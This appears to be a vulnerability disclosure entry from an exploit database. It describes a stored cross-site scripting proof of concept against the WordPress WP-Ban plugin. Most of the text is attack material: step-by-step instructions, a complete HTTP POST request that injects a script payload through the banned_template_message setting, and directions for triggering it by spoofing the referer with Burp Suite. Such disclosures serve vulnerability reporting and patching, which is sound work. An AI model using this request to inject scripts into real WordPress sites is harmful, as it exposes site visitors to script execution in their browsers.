Share
## https://sploitus.com/exploit?id=WPEX-ID:D0CF24BE-DF87-4E1F-AAE7-E9684C88E7DB
1. Go to the plugin settings and set these fields: In "Banned Referrers", add "xss" and in "Banned Message", add "<script>alert(123);</script>"

2. Go to the website's homepage using Burp Suite and its Interceptor.

3. Intercept the request, change the "referrer" to "xss" and confirm the request. The alert triggers successfully.
 
The request is:
 
POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1

_wpnonce=<nonce key>&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_option_reverse_proxy=1&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=xss&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit=Save+Changes










-video: https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
=======
You need to trigger a `ban rule` to display the `ban message`.
For example, I set the `ban rule` to let the `referer` not equal to `xss`.
The package is like this:
```http
POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
...
_wpnonce=c298ada8b0&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_option_reverse_proxy=1&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=xss&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit=Save+Changes
```
We set the `banned_referers=xss`, and the payload in the parameter `banned_template_message`.

Then go to the main page, refresh the page, and set the referer as `xss`, the vulnerability will be triggered.